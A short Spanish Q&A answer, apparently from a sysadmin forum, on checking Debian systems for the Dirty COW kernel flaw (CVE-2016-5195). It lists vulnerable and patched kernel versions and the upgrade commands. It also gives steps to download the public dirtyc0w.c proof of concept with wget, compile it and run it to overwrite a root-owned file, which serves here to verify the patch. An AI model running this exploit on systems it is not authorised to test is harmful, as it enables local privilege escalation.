Según security-tracker.debian , debe ejecutar uname -a
y verificar la versión actual de su kernel.
wheezy 3.2.78-1 vulnerable
wheezy (security) 3.2.82-1 fixed
jessie 3.16.36-1+deb8u1 vulnerable
jessie (security) 3.16.36-1+deb8u2 fixed
stretch, sid 4.7.8-1 fixed
Esta vulnerabilidad está parcheada en debian, al actualizar su sistema:
apt-get update
apt-get upgrade
apt-get dist-upgrade
Editar
¿Cómo asegurarme de que mi sistema operativo no se vea afectado por CVE-2016-5195?
Puede probar lo siguiente tutorial .
Descarga el exploit.
wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c
Como root: crea el archivo foo
:
su
echo this is not a test > foo
Como usuario:
gcc -lpthread dirtyc0w.c -o dirtyc0w
gcc -pthread dirtyc0w.c -o dirtyc0w
./dirtyc0w foo m00000000000000000
Verifique su archivo:
cat foo
En la máquina vulnerable obtendrá m00000000000000000
como resultado.